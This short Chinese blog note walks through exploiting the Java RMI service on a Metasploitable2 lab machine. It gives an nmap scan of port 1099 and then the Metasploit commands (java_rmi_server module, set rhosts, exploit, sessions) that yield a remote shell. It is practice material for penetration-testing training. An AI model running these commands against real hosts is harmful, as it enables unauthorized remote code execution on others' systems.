Java rmi 漏洞利用笔记
Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。实验环境:攻击机:kali linuxip:192.168.172.134目标机:Metasploittable2ip:192.168.172.129攻击过程:step1:nmap扫描漏...
·
Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。
实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129
攻击过程:
step1:nmap扫描漏洞
命令:nmap -sV -p 1099 192.168.172.129
step2:使用msf漏洞利用,启动msf
命令:use exploit/multi/misc/java_rmi_server
命令:show options
命令:set rhosts 192.168.172.129
命令:exploit
命令:sessions -i
step2:获得目录shell.
华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。
更多推荐
0
0- 0
已为社区贡献10条内容
所有评论(0)